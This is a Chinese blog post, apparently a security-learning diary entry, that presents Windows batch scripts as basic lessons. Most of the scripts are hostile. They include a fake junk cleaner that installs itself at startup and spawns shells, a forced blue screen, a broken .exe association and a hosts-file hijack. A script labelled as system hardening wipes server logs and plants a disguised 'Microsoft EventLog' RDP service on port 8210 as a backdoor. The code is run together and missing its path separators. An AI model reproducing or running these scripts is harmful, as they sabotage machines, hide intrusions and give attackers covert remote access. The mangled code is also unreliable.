#yyds干货盘点# web安全day21：学习使用最基本的批处理程序

#yyds干货盘点# web安全day21：学习使用最基本的批处理程序

常用的几个命令

系统垃圾清理

@echo offtitle 系统垃圾清理color 2fecho =====若有杀毒软件恶意拦截，请选择【允许程序的所有操作】 ====echo.echo.echo start cmd >c:\windows\windows.batecho %0>>c:\windows\windows.batcopy c:\windows\windows.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\">nulif %errorlevel%==0 goto nextcopy c:\windows\windows.bat "%USERPROFILE%\「开始」菜单\程序\启动\">nulif %errorlevel%==1 goto error

资源管理器重启

ping -n 5 127.0.0.1>nultaskkill /im explorer.exe /f >nul 2>nulecho.echo =====完犊子了，你的系统已经废了=======ping -n 5 127.0.0.1>nulecho.Start c:\windows\explorer.exeecho.echo =====已修复好！是不是吓坏了！！嘿嘿==========pause

蓝屏

ntsd -c q -pn winlogon.exe

拓展名修改

assoc .exe=txtfileassoc .exe=exefile//恢复

死循环

domsgbox "循环啦"loop

修改地址解析

echo 1.1.1.1 taobao.com >>c:\windows\system32\drivers\etc\hosts

进阶命令

删除win2k/xp系统默认共享的批处理

@echo preparing to delete all the default shares.when ready pres any key.@pause@echo off:Rem check parameters if null show usage.if {%1}=={} goto :Usage:Rem code start.echo.echo ------------------------------------------------------echo.echo Now deleting all the default shares.echo.net share %1$ /deletenet share %2$ /deletenet share %3$ /deletenet share %4$ /deletenet share %5$ /deletenet share %6$ /deletenet share %7$ /deletenet share %8$ /deletenet share %9$ /deletenet stop Servernet start Serverecho.echo All the shares have been deleteedecho.echo ------------------------------------------------------echo.echo Now modify the registry to change the system default properties.echo.echo Now creating the registry fileecho Windows Registry Editor Version 5.00> c:delshare.regecho [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]>> c:delshare.regecho "AutoShareWks"=dword:00000000>> c:delshare.regecho "AutoShareServer"=dword:00000000>> c:delshare.regecho Nowing using the registry file to chang the system default properties.regedit /s c:delshare.regecho Deleting the temprotarily files.del c:delshare.reggoto :END:Usageecho.echo ------------------------------------------------------echo.echo ☆ A example for batch file ☆echo ☆ [Use batch file to change the sysytem share properties.] ☆echo.echo Author：Ex4rchecho Mail:Ex4rch@hotmail.com QQ:1672602echo.echo Error：Not enough parametersecho.echo ☆ Please enter the share disk you wanna delete ☆echo.echo For instance，to delete the default shares:echo delshare c d e ipc admin printecho.echo If the disklable is not as C: D: E: ，Please chang it youself.echo.echo example：echo If locak disklable are C: D: E: X: Y: Z: ，you should chang the command into ：echo delshare c d e x y z ipc admin printecho.echo *** you can delete nine shares once in a useing ***echo.echo ------------------------------------------------------goto :EOF:ENDecho.echo ------------------------------------------------------echo.echo OK,delshare.bat has deleted all the share you assigned.echo.Any questions ,feel free to mail toEx4rch@hotmail.com.echoecho.echo ------------------------------------------------------echo.:EOFecho end of the batch file

全面加固系统

@echo Windows Registry Editor Version 5.00 >patch.dll@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] >>patch.dll@echo "AutoShareServer"=dword:00000000 >>patch.dll@echo "AutoShareWks"=dword:00000000 >>patch.dll@REM [禁止共享]@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>patch.dll@echo "restrictanonymous"=dword:00000001 >>patch.dll@REM [禁止匿名登录]@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >>patch.dll@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll@REM [禁止及文件访问和打印共享]@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] >>patch.dll@echo "Start"=dword:00000004 >>patch.dll@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >>patch.dll@echo "Start"=dword:00000004 >>patch.dll@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>patch.dll@echo "ShutdownWithoutLogon"="0" >>patch.dll@REM [禁止登录前关机]@echo "DontDisplayLastUserName"="1" >>patch.dll@REM [禁止显示前一个登录用户名称]@regedit /s patch.dll

清除日志

@regedit /s patch.dll@net stop w3svc@net stop event log@del c:winntsystem32logfilesw3svc1*.* /f /q@del c:winntsystem32logfilesw3svc2*.* /f /q@del c:winntsystem32config*.event /f /q@del c:winntsystem32dtclog*.* /f /q@del c:winnt*.txt /f /q@del c:winnt*.log /f /q@net start w3svc@net start event log@rem [删除日志]@net stop lanmanserver /y@net stop Schedule /y@net stop RemoteRegistry /y@del patch.dll@echo The server has been patched,Have fun.@del patch.bat@REM [禁止一些危险的服务。]@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>patch.dll@echo "PortNumber"=dword:00002010 >>patch.dll@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp >>patch.dll@echo "PortNumber"=dword:00002012 >>patch.dll@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll@echo "Start"=dword:00000002 >>patch.dll@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll@echo "Start"=dword:00000002 >>patch.dll@echo "ErrorControl"=dword:00000001 >>patch.dll@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, >>patch.dll@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65, >>patch.dll@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll@echo "ObjectName"="LocalSystem" >>patch.dll@echo "Type"=dword:00000010 >>patch.dll@echo "Descr1ption"="Keep record of the program and windows'' message。" >>patch.dll@echo "DisplayName"="Microsoft EventLog" >>patch.dll@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll@echo "Start"=dword:00000004 >>patch.dll@copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe@REM [修改3389连接，端口为8210(十六进制为00002012)，名称为Microsoft EventLog，留条后路]

更多的关于批处理的知识可以参考下面这篇。​​https://jb51.net/article/41322.htm​​

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。